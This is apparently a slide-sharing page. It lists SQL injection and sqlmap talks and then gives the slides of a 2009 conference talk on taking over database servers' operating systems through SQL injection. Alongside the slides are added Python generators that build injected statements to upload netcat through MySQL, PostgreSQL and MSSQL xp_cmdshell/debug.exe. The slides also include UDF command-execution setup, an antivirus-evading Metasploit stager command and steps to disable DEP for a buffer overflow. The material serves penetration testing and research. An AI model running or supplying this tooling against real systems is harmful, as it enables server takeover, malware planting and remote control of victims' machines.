Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
These slides have been presented at OWASP AppSec Europe 2009 conference in Krakow on May 13, 2009.
Full version presented at the Black Hat Europe 2009 conference; slides available at http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
Expanding the control over the operating system from the database (Bernardo Damele A. G.)
A database, reached either through a SQL injection or through a direct connection, can be used as a stepping stone to control the underlying operating system.
There is much to say about operating system control by owning a database server: Windows registry access, anti-forensics techniques to establish an out-of-band stealth connection, buffer overflow exploitation with memory protection bypass, and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
Advanced SQL injection to operating system full control (short version) (Bernardo Damele A. G.)
Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
These slides have been presented at EUSecWest conference in London on May 28, 2009.
Full version presented at the Black Hat Europe 2009 conference; slides available at http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in the real world: how to abuse database features to take over the server as a whole, how to break out of the mere database process, get control of the operating system and escalate the process's privileges to SYSTEM, and how to make the life of the forensic analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate in detail common and uncommon problems, and their respective solutions, with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real-world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single-entry UNION query SQL injection, specific web application technology IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Advanced SQL injection to operating system full control (whitepaper) (Bernardo Damele A. G.)
Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those overlooked and theoretically not exploitable scenarios: from command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version, which I will release at the conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
Advanced SQL injection to operating system full control (slides) (Bernardo Damele A. G.)
Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those overlooked and theoretically not exploitable scenarios: from command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version, which I will release at the conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at the Black Hat Europe conference in Amsterdam on April 16, 2009.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
These are the slides from a talk "sqlmap - security development in Python" held at the EuroPython 2011 conference (Italy / Florence, 19th–26th June 2011) by Miroslav Stampar.
These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
A pragmatic approach to different SQL injection techniques, such as stacked statements, tautology-based, UNION-based, error-based, second-order and blind SQL injection, coherently explaining the path behind these attacks and including tips and tricks to make them more likely to work in real life.
I will also show you ways to avoid weak defenses such as blacklisting and quote filtering, as well as how privilege escalation may take place from this sort of vulnerability.
There will be a live demonstration where you can catch up on some handy tools and actually see blind SQL injection working efficiently with the latest techniques, showing you why this type of SQL injection shouldn't be taken any less seriously than any other.
Finally, a word on countermeasures and real solutions to prevent these attacks, what you should do and what you should not.
http://videos.sapo.pt/ZvwITnTBMzD8HYvEZrov (video)
A basic tutorial on using sqlmap on Kali Linux for SQL injection.
The main focus is on the comparison between manual and automated SQL injection.
Some important parameters are discussed, along with the steps to be taken to discover vulnerabilities.
By Rushikesh Kulkarni, president of the Anonymous Club of BMSCE.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches, ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
It all starts with the ' (SQL injection from attacker's point of view) (Miroslav Stampar)
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at the FSec 2011 conference (Croatia / Varazdin, 22nd September 2011) by Miroslav Stampar.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate in detail common and uncommon problems, and their respective solutions, with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real-world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single-entry UNION query SQL injection, specific web application technology IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
Enable Database Service over HTTP or IBM WebSphere MQ in 15 minutes with IAS (Invenire Aude)
How to access the database and implement a service over HTTP/REST or IBM WebSphere MQ (XML or JSON).
Quick introduction to the SQL extension for IAS Data Processors.
http://www.invenireaude.com/content/blogs/index.html
Show the reader the potential damage that a SQL injection vulnerability can do. Show evasion techniques for some filters. Show some common mistakes that programmers make when protecting their sites. Show the best practices to protect your code.
SQL Injection: complete walkthrough (not only) for PHP developers (Krzysztof Kotowicz)
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
Data Tracking: On the Hunt for Information about Your Database (Michael Rosenblum)
Behind the scenes, Oracle databases hide a myriad of processes to ensure that your data can be safely stored and retrieved. These processes also leave “tracks” (or they COULD leave tracks if you set them up properly). These tracks, together with application-specific data, create a complete representation of the system’s day-to-day activity. Too often this representation is lost at the DBA/Developer borderline, mostly because one side is not aware of the needs of the other. This presentation strives to bridge this gap. It focuses on key sources of database information and techniques that are useful for both DBAs and developers:
- Data Dictionary
- Oracle Logging
- Oracle Tracing
- Advanced code instrumentation
2. SQL injection definition
SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements.
It is a common threat in web applications that lack proper sanitization of user-supplied input used in SQL queries.
It does not affect only web applications: any client that builds SQL statements from untrusted input is exposed.
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 2
3. SQL injection techniques
Boolean-based blind SQL injection:
par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num--
UNION query (in-band) SQL injection:
par=1 UNION ALL SELECT query--
Batched queries SQL injection:
par=1; SQL query;--
4. How far can an attacker go by exploiting a SQL injection?
5. Scope of the analysis
Three database servers:
MySQL on Windows
PostgreSQL on Windows and Linux
Microsoft SQL Server on Windows
Three web application languages:
ASP on Microsoft IIS, Windows
ASP.NET on Microsoft IIS, Windows
PHP on Apache and Microsoft IIS
6. Batched queries
In SQL, batched queries are multiple SQL statements, separated by a semicolon, passed to the database in a single request.
Example:
SELECT col FROM table1 WHERE id=1; DROP TABLE table2;
7. Batched queries support
                       ASP   ASP.NET   PHP
MySQL                  No    Yes       No
PostgreSQL             Yes   Yes       Yes
Microsoft SQL Server   Yes   Yes       Yes
Default support for batched queries in the programming languages' DBMS connectors.
"No" refers to the default connector and settings only: PHP's mysqli_multi_query() or a client opened with the CLIENT_MULTI_STATEMENTS flag accepts several statements on MySQL, so check the actual connector in use rather than relying on the language.
8. File system write access
9. File write access on MySQL
On the attacker box:
Encode the local file content to its corresponding hexadecimal string
Split the hexadecimal encoded string into chunks of 1024 characters each
10. File write access on MySQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data longblob);
INSERT INTO footable(data) VALUES
(0x4d5a90…610000);
UPDATE footable SET
data=CONCAT(data, 0xaa270000…000000);
[…];
SELECT data FROM footable INTO DUMPFILE
'C:/WINDOWS/Temp/nc.exe';
11. File write access on PostgreSQL
On the attacker box:
Encode the local file content to its corresponding base64 string
Split the base64 encoded string into chunks of 1024 characters each
12. File write access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
INSERT INTO footable(data) VALUES ('TVqQ…');
UPDATE footable SET data=data||'U8pp…vgDw';
[…]
SELECT lo_create(47);
UPDATE pg_largeobject SET data=(DECODE((SELECT
data FROM footable), 'base64')) WHERE loid=47;
SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe');
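Slides 9 to 12 describe the attacker-side preparation (encode the file, split it into 1024-character chunks) and the batched statements for both backends. The Python below is an added example, not code from the slides or from sqlmap; it generates both statement sequences from a file's bytes with one shared chunking helper. The table name footable, the large-object OID 47 and the destination path are the slides' own placeholders, and the SAMPLE bytes are constructed. Two practical caveats: on MySQL, SELECT ... INTO DUMPFILE needs the FILE privilege and, on recent versions, a destination under secure_file_priv; on PostgreSQL, updating pg_largeobject directly and calling the server-side lo_export() need a superuser session (on PostgreSQL 11 and later the pg_write_server_files role suffices for lo_export).

```python
"""Batched-query file write generators for MySQL and PostgreSQL (added example)."""
import base64

CHUNK_CHARS = 1024  # characters of encoded data per statement, as on the slides


def split_chunks(encoded, size=CHUNK_CHARS):
    """Cut an encoded string into pieces of at most `size` characters."""
    if not encoded:
        raise ValueError("nothing to write")
    return [encoded[i:i + size] for i in range(0, len(encoded), size)]


def mysql_write_statements(data, dest, table="footable"):
    """MySQL: hex literals accumulated in a LONGBLOB, then SELECT ... INTO DUMPFILE.
    Hex literals need no quoting, so the payload survives filters on quotes."""
    parts = split_chunks(data.hex())
    stmts = ["CREATE TABLE %s(data longblob);" % table,
             "INSERT INTO %s(data) VALUES (0x%s);" % (table, parts[0])]
    for part in parts[1:]:
        stmts.append("UPDATE %s SET data=CONCAT(data, 0x%s);" % (table, part))
    stmts.append("SELECT data FROM %s INTO DUMPFILE '%s';" % (table, dest))
    return stmts


def postgresql_write_statements(data, dest, table="footable", loid=47):
    """PostgreSQL: base64 text accumulated, decoded into a large object, exported."""
    parts = split_chunks(base64.b64encode(data).decode("ascii"))
    stmts = ["CREATE TABLE %s(data text);" % table,
             "INSERT INTO %s(data) VALUES ('%s');" % (table, parts[0])]
    for part in parts[1:]:
        stmts.append("UPDATE %s SET data=data||'%s';" % (table, part))
    stmts += ["SELECT lo_create(%d);" % loid,
              "UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM %s), 'base64')) "
              "WHERE loid=%d;" % (table, loid),
              "SELECT lo_export(%d, '%s');" % (loid, dest)]
    return stmts


def inject(statement):
    """Wrap one statement into the batched-queries payload: par=1; statement;--
    Sending one statement per request keeps every URL short."""
    return "1; %s-- " % statement


# Constructed sample: a fake PE header followed by padding, standing in for nc.exe.
SAMPLE = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + bytes(2032)

if __name__ == "__main__":
    for s in mysql_write_statements(SAMPLE, "C:/WINDOWS/Temp/nc.exe"):
        print(inject(s)[:80])
```

The 1024-character chunk size is a compromise between request count and URL length; a 60 KB netcat binary becomes about 120 MySQL requests (two hex characters per byte) or about 80 PostgreSQL requests (base64 inflates by a third). The written file is owned by the database process, so the destination must be writable by that account and, for a later UDF load, readable by it.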
13. File write access on MS SQL Server
Microsoft SQL Server can execute operating system commands through the xp_cmdshell() extended stored procedure:
EXEC master..xp_cmdshell 'echo … >> filepath'
Session user must have the CONTROL SERVER privilege
On the attacker box:
Split the file in chunks of 64 KB (debug.exe works within a single 64 KB memory segment; being a 16-bit program, it is only available on 32-bit Windows)
Convert each chunk to its plain text debug script format
14. File write access on MS SQL Server
Example of nc.exe:
00000000 4D 5A 90 00 03 00 00 00
00000008 04 00 00 00 FF FF 00 00
[…]
As a plain text debug script:
n qqlbc                    // Set the name of the temporary output file
rcx                        // Write the chunk size (in hex) into
f000                       // the CX register: the byte count for 'w'
f 0100 f000 00             // Fill the segment with 0x00
e 100 4d 5a 90 00 03 […]   // Enter the bytes into memory from offset 0x100,
e 114 00 00 00 00 40 […]   // 20 bytes per line
[…]
w                          // Write CX bytes from offset 0x100 to the file
q                          // Quit debug.exe
15. File write access on MS SQL Server
Via batched queries SQL injection technique:
For each debug script:
EXEC master..xp_cmdshell '
echo n qqlbc >> C:\WINDOWS\Temp\zdfiq.scr &
echo rcx >> C:\WINDOWS\Temp\zdfiq.scr &
echo f000 >> C:\WINDOWS\Temp\zdfiq.scr &
echo f 0100 f000 00 >> C:\WINDOWS\Temp\zdfiq.scr &
[…]'
16. File write access on MS SQL Server
EXEC master..xp_cmdshell '
cd C:\WINDOWS\Temp &
debug < C:\WINDOWS\Temp\zdfiq.scr &
del /F C:\WINDOWS\Temp\zdfiq.scr &
copy /B /Y netcat+qqlbc netcat'
EXEC master..xp_cmdshell '
cd C:\WINDOWS\Temp &
move /Y netcat C:/WINDOWS/Temp/nc.exe'
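Slides 13 to 16 outline the debug.exe route: cut the binary into chunks, turn each chunk into a debug script, append the script line by line with echo through xp_cmdshell, run debug on it and join the chunks with copy /B. The Python below is an added example, not code from the slides or from sqlmap; it produces the script lines and the xp_cmdshell batches for an arbitrary binary. The chunk names, the temporary directory, the netcat working name and the zdfiq.scr script name are assumptions mirroring the slides' placeholders, and the SAMPLE bytes are constructed. Each chunk is capped at 0xF000 bytes so that, starting at offset 0x100, it stays inside the single 64 KB segment debug.exe works in, and the first chunk is copied on its own rather than concatenated to a not-yet-existing file.

```python
"""debug.exe script and xp_cmdshell batch generator (added example)."""

MAX_CHUNK = 0xF000   # per debug script: 0x100 + 0xF000 stays inside one 64 KB segment
BYTES_PER_LINE = 20  # slide 14 enters 20 bytes per 'e' line (offsets 100, 114, ...)


def split_chunks(data, size=MAX_CHUNK):
    """Cut the binary into pieces small enough for one debug.exe session each."""
    if not data:
        raise ValueError("nothing to write")
    return [data[i:i + size] for i in range(0, len(data), size)]


def debug_script(chunk, name):
    """Plain-text debug.exe script writing `chunk` to file `name` (slide 14 layout)."""
    lines = ["n %s" % name,                 # output file name
             "rcx",                         # next line is the new CX value:
             "%x" % len(chunk),             # number of bytes 'w' will write
             "f 0100 %x 00" % len(chunk)]   # zero the work area, as on the slide
    for off in range(0, len(chunk), BYTES_PER_LINE):
        hexbytes = " ".join("%02x" % b for b in chunk[off:off + BYTES_PER_LINE])
        lines.append("e %x %s" % (0x100 + off, hexbytes))  # enter bytes from DS:0100
    lines += ["w", "q"]                     # write CX bytes from offset 0x100, quit
    return lines


def xp_cmdshell(command):
    """Wrap a cmd.exe command line in the call used on the slides, escaping quotes."""
    return "EXEC master..xp_cmdshell '%s'" % command.replace("'", "''")


def echo_batches(script_lines, scr_path, max_len=4000):
    """Append the script to scr_path with 'echo line >> file' commands joined by '&'.
    Several xp_cmdshell calls are emitted so that each command string stays short.
    The script holds only hex digits, spaces and a few letters, nothing that
    cmd.exe would interpret, so no further escaping is needed."""
    batches, current = [], []
    for line in script_lines:
        cmd = "echo %s >> %s" % (line, scr_path)
        if current and len(" & ".join(current + [cmd])) > max_len:
            batches.append(xp_cmdshell(" & ".join(current)))
            current = []
        current.append(cmd)
    if current:
        batches.append(xp_cmdshell(" & ".join(current)))
    return batches


def upload_statements(data, tmp_dir=r"C:\WINDOWS\Temp", scr="zdfiq.scr",
                      joined="netcat", dest="nc.exe"):
    """Full sequence of T-SQL statements: per chunk, write and run the script,
    then append the chunk to the joined file; finally move the result into place."""
    scr_path = "%s\\%s" % (tmp_dir, scr)
    stmts = []
    for i, chunk in enumerate(split_chunks(data)):
        name = "chunk%d" % i   # the slides use random names such as qqlbc
        stmts += echo_batches(debug_script(chunk, name), scr_path)
        # the first chunk starts the joined file; later ones are appended with copy /B
        join = ("copy /B /Y %s %s" % (name, joined) if i == 0
                else "copy /B /Y %s+%s %s" % (joined, name, joined))
        stmts.append(xp_cmdshell("cd %s & debug < %s & del /F %s & %s & del /F %s"
                                 % (tmp_dir, scr_path, scr_path, join, name)))
    stmts.append(xp_cmdshell("cd %s & move /Y %s %s\\%s" % (tmp_dir, joined, tmp_dir, dest)))
    return stmts


# Constructed sample: the first 40 bytes of a fake PE header, standing in for nc.exe.
SAMPLE = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + bytes(24)

if __name__ == "__main__":
    for s in upload_statements(SAMPLE):
        print(s[:100])
```

Every echo line travels inside a T-SQL string literal, so a single quote in the script would have to be doubled; the debug script never contains one, but xp_cmdshell() escapes anyway so the helper is safe to reuse for other commands. The 4000-character cap per call is chosen because xp_cmdshell's argument is an nvarchar(4000).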
18. User-Defined Function
In SQL, a user-defined function is a custom function that can be evaluated in SQL statements.
UDFs can be created from shared libraries, which are compiled binary files:
Dynamic-link library (DLL) on Windows
Shared object (.so) on Linux
19. UDF injection
On the attacker box:
Compile a shared library defining two UDFs:
sys_eval(cmd): executes cmd, returns its standard output
sys_exec(cmd): executes cmd, returns its exit status
The shared library can also be packed to speed up the upload via SQL injection:
Windows: UPX for the dynamic-link library
Linux: strip for the shared object (it removes the debugging and static symbol tables but keeps the dynamic symbols the loader needs)
20. UDF injection
Via batched queries SQL injection technique:
Upload the shared library to the DBMS file system
Create the two UDFs from the shared library
Call either of the UDFs to execute commands
21. UDF injection on MySQL
UDF Repository for MySQL
lib_mysqludf_sys shared library:
Approximately 6 KB packed
Added sys_eval() to return the command's standard output
Compliant with MySQL 5.0+
Works on all versions of MySQL from 4.1.0
Compatible with both Windows and Linux
22. UDF injection on MySQL
Via batched queries SQL injection technique:
Fingerprint MySQL version
Upload the shared library to a file system path where MySQL looks for them (from MySQL 5.0.67 on that is the plugin_dir directory only; earlier versions resolve the name through the system dynamic linker search path)
CREATE FUNCTION sys_exec RETURNS int SONAME 'libudffmwgj.dll';
CREATE FUNCTION sys_eval RETURNS string SONAME 'libudffmwgj.dll';
CREATE FUNCTION records the UDF in the mysql.func table, so the session user needs the INSERT privilege on the mysql database.
23. UDF injection on PostgreSQL
Ported the MySQL shared library to PostgreSQL
lib_postgresqludf_sys shared library:
Approximately 6 KB packed
C-language functions: sys_eval() and sys_exec()
Compliant with PostgreSQL 8.2+ magic block
Works on all versions of PostgreSQL from 8.0
Compatible with both Windows and Linux
24. UDF injection on PostgreSQL
Via batched queries SQL injection technique:
Fingerprint PostgreSQL version
Upload the shared library to any file system path where PostgreSQL has read/write access
CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'libudflenpx.dll', 'sys_exec' LANGUAGE C […];
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'libudflenpx.dll', 'sys_eval' LANGUAGE C […];
C is an untrusted language in PostgreSQL, so only a superuser can create these functions.
25. Command execution on MS SQL Server
xp_cmdshell() stored procedure:
Session user must have the sysadmin role or be specified as a proxy account
Enabled by default on MS SQL Server 2000, or re-enabled via sp_addextendedproc if it was dropped
26. Command execution on MS SQL Server
Disabled by default on MS SQL Server 2005 and 2008, it can be:
Re-enabled via sp_configure
Created from scratch using the shell object (WScript.Shell through the sp_OACreate OLE automation procedures)
28. OOB connection definition
Contrary to an in-band connection (HTTP), an out-of-band connection uses an alternative channel to return data.
This concept can be extended to establish a full-duplex connection between the attacker host and the database server.
Over this channel the attacker can have a command prompt or graphical access (VNC) to the DBMS server.
29. A good friend: Metasploit
Metasploit is a powerful open source exploitation framework.
Post-exploitation in a SQL injection scenario: SQL injection can be used as a stepping stone for an OOB channel using Metasploit.
This requires file system write access and command execution via the in-band connection, both already achieved.
30. OOB via payload stager
On the attacker box:
Forge a stand-alone payload stager with msfpayload
Encode it with msfencode to bypass AV
Pack it with UPX to speed up the upload via SQL injection if the target OS is Windows
31. OOB via payload stager
Example of payload stager creation and encoding (msfpayload and msfencode have since been replaced by msfvenom in current Metasploit releases):
$ msfpayload windows/meterpreter/bind_tcp EXITFUNC=process LPORT=31486 R | msfencode -e x86/shikata_ga_nai -t exe -o stagerbvdcp.exe
Payload stager compression:
$ upx -9 -qq stagerbvdcp.exe
The payload stager size is 9728 bytes; as a compressed executable its size is 2560 bytes.
32. OOB via payload stager
On the attacker box:
Run msfcli with the multi/handler exploit
Via batched queries SQL injection technique:
Upload the stand-alone payload stager to the file system temporary folder of the DBMS
Execute it via sys_exec() or xp_cmdshell()
33. Stored procedure buffer overflow
Discovered by Bernhard Mueller on December 4, 2008
sp_replwritetovarbin heap-based buffer overflow on Microsoft SQL Server 2000 SP4 and Microsoft SQL Server 2005 SP2
Patched by Microsoft on February 10, 2009 (MS09-004)
34. Buffer overflow exploit
Session user needs only EXECUTE privilege on the stored procedure (the default)
Guido Landi wrote the first public stand-alone exploit for this vulnerability
I added support for multi-stage payload and integrated it in sqlmap
35. Data Execution Prevention
DEP is a security feature that prevents code execution in memory pages not marked as executable.
It can be configured to allow exceptions.
Default settings allow exceptions (OptOut: DEP is on for every process except those explicitly excluded):
Windows 2003 SP1+: OptOut
Windows 2008 SP0+: OptOut
36. Bypass DEP
When it is set to OptOut:
Add an exception for sqlservr.exe in the registry:
Via a bat file calling reg
Via a reg file passed to regedit
Via master..xp_regwrite
Upload and execute a bat file which calls sc to restart the SQL Server service, so the process comes back with DEP disabled and the overflow can be exploited
37. Credits
Guido Landi
Alberto Revelli
Alessandro Tanasi
Metasploit development team
More acknowledgments and references on
the white paper, http://tinyurl.com/sqlmap1
39. Thanks for your attention!
Bernardo Damele Assumpção Guimarães
bernardo.damele@gmail.com
http://bernardodamele.blogspot.com
http://sqlmap.sourceforge.net